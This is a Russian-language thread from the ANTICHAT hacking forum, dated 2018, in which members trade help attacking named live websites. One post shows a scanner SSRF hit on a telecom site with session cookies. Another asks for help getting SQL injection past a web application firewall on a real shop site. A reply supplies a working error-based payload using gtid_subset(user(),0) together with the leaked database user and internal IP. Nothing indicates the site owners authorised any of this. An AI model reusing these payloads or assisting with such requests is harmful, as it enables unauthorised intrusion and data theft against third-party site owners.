HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2401  
Старый 28.08.2018, 19:43
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Есть тут уязвимость?
Нет. Разве что бекслешем сломать запрос.

Цитата:
Сообщение от Gorbachev  
Gorbachev said:

Дальше этот колхоз в виде картинки разглядывать не стал.
Держи нас в курсе.
 
Ответить с цитированием

  #2402  
Старый 28.08.2018, 20:33
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

А не подскажите как в таких ситуациях выводить БД/таблицы? А то пробовал и в hex загонять не выходит (толи руки не оттуда(( )
Оно на современных версиях кроме version() ничего не выведет, не принимает подзапросы. Нужно искать другой вектор.
 
Ответить с цитированием

  #2403  
Старый 06.09.2018, 04:48
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Server side request forgery

Сканер показывает но когда начал разбираться понял что кажись ложное.

Ну я рукожоп кто что скажет по этому поводу ?


Код:
Code:
Attack details

URL encoded GET input was set to http://hitLVcyIasXkF.bxss.me/

An HTTP request was initiated for the domain hitLVcyIasXkF.bxss.me which indicates that this script is vulnerable to SSRF.

HTTP request details:
IP address: 91.204.73.53
User agent: Web Optimizer Downloader

HTTP request

GET /sites/all/modules/weboptimizer/web-optimizer/cache/wo.static.php?http://hitLVcyIasXkF.bxss.me/ HTTP/1.1
Cookie: SESSb528791853c11d9e7e82fab0a8e003d2=kvpg8nj53d8rjuceaktobpo0p2; _ym_uid=1536190447487022978; _ym_d=1536190447; _ym_isad=2; _ym_visorc_22122178=w; jv_enter_ts_vIAkaUXWoO=1536190587910; jv_visits_count_vIAkaUXWoO=1; jv_refer_vIAkaUXWoO=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); jv_utm_vIAkaUXWoO=; jv_pages_count_vIAkaUXWoO=4; yp=1851550627.yrtsi.1536190627; yandexuid=3741984211536190850; yabs-sid=863698391536190850; przvdom=aec9e0b96eda1de56e7eca16487d8d2ef79cce42ed4c98f1c0c900b331344c90; przvlng=ru; przvgl=6c2147e2951f84179d9f2216c0be95adbabf6df2deaa2e03910bfa85f2369217; przvusr=e58c712e76e2839e403274f18df9c76c81e49678fb83c2f3b64b7a13cfdc21ae; przvonline=1; przvdistance=0; jv_close_time_vIAkaUXWoO=1536191313662
Host: dominant-telecom.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
 
Ответить с цитированием

  #2404  
Старый 06.09.2018, 05:32
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

Sensoft, а что за сканер использовался?
 
Ответить с цитированием

  #2405  
Старый 06.09.2018, 14:19
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от Gorbachev  
Gorbachev said:

Sensoft
, а что за сканер использовался?
акаунтикс
 
Ответить с цитированием

  #2406  
Старый 10.09.2018, 12:14
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Помогите подобрать вектор, никак не могу понять что фильтруется(

Почти постоянно упираюсь в ошибку: 412 Precondition Failed

Хоть какой-то другой вывод был при таких запросах:

.SpoilerTarget" type="button">Spoiler: One

Код:
Code:
URL: demo.site.net/index.php?information_id=3&route=information/information%27and(extrac-tvalue(null,con-cat(1,(select+user()))))=%271/251

Fatal error: Uncaught Exception:
Error: Unknown column 'extrac' in 'where clause'
Error No: 1054
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(extrac-tvalue(null,con-cat(1,(select user()))))='1/251' in /home/www/demo.site.net/system/database/mysqli.php:39
Stack trace:
#0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
#1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
#2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
#3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
#4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
#5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
#6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39
.SpoilerTarget" type="button">Spoiler: Two

Код:
Code:
URL: demo.site.net/index.php?information_id=3&route=information/information%27and(oc_user())=%27
Fatal error: Uncaught Exception: Error: FUNCTION vilmargp_demo.oc_user does not exist
Error No: 1305
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(oc_user())='' in /home/www/demo.site.net/system/database/mysqli.php:39
Stack trace:
#0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
#1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
#2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
#3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
#4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
#5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
#6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39

vilmargp_demo
 
Ответить с цитированием

  #2407  
Старый 10.09.2018, 12:32
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

Помогите подобрать вектор, никак не могу понять что фильтруется(
Почти постоянно упираюсь в ошибку: 412 Precondition Failed
Хоть какой-то другой вывод был при таких запросах:
Spoiler: One
Код:
Code:
URL: demo.villagedefrance.net/index.php?information_id=3&route=information/information%27and(extrac-tvalue(null,con-cat(1,(select+user()))))=%271/251

Fatal error: Uncaught Exception:
Error: Unknown column 'extrac' in 'where clause'
Error No: 1054
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(extrac-tvalue(null,con-cat(1,(select user()))))='1/251' in /home/www/demo.site.net/system/database/mysqli.php:39
Stack trace:
#0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
#1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
#2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
#3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
#4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
#5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
#6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39
Spoiler: Two
Код:
Code:
URL: demo.villagedefrance.net/index.php?information_id=3&route=information/information%27and(oc_user())=%27
Fatal error: Uncaught Exception: Error: FUNCTION vilmargp_demo.oc_user does not exist
Error No: 1305
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information'and(oc_user())='' in /home/www/demo.site.net/system/database/mysqli.php:39
Stack trace:
#0 /home/www/demo.site.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array)
#1 /home/www/demo.site.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...')
#2 /home/www/demo.site.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...')
#3 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index()
#4 /home/www/demo.site.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action))
#5 /home/www/demo.site.net/index.php(237): Front->dispatch(Object(Action), Object(Action))
#6 {main} thrown in /home/www/demo.site.net/system/database/mysqli.php on line 39

vilmargp_demo
Там waf стоит

Ваш запрос был отфильтрован из-за возможных проблем безопасности.

Ищи тамперы которые подойдут по другому не как

Ну или ищи гуру по sql injection, есть тут уникумы которые и руками раскрутят, там вроде waf не очень хороший стоит
 
Ответить с цитированием

  #2408  
Старый 10.09.2018, 13:37
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

Код:
Code:
http://demo.villagedefrance.net/index.php?information_id=3&route=information/information' AND gtid_subset(user(),0) AND '1#
Код:
Code:
Fatal error: Uncaught Exception: Error: Malformed GTID set specification 'vilmargp_demo@10.123.0.65'.
Error No: 1772
SELECT * FROM `oc_url_alias` WHERE `query` = 'information/information' AND gtid_subset(user(),0) AND '1' in /home/www/demo.villagedefrance.net/system/database/mysqli.php:39 Stack trace: #0 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_library_db.php(20): DBMySQLi->query('SELECT * FROM `...', Array) #1 /home/www/demo.villagedefrance.net/system/library/dbmemory.php(16): DB->query('SELECT * FROM `...') #2 /home/www/demo.villagedefrance.net/catalog/controller/common/seo_url.php(95): Dbmemory->query('SELECT * FROM `...') #3 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_engine_front.php(41): ControllerCommonSeoUrl->index() #4 /home/www/demo.villagedefrance.net/vqmod/vqcache/vq2-system_engine_front.php(19): Front->execute(Object(Action)) #5 /home/www/demo.villagedefrance.net/index.php(237): Front->dispatch(Object(Action), Object(Action)) #6 {main} thrown in /home/www/demo.villagedefrance.net/system/database/mysqli.php on line 39
 
Ответить с цитированием

  #2409  
Старый 10.09.2018, 18:00
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

joelblack красиво потроллил
 
Ответить с цитированием

  #2410  
Старый 12.09.2018, 19:30
Тот_самый_Щуп
Guest
Сообщений: n/a
Провел на форуме:
47768

Репутация: 119
По умолчанию

Цитата:
Сообщение от okey  
okey said:

Всем привет, хотел бы узнать у более профессионалов, есть ли в этом коде уязвимости? Заранее благодарен)
Да, в этом коде есть уязвимости. Можешь не благодарить.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ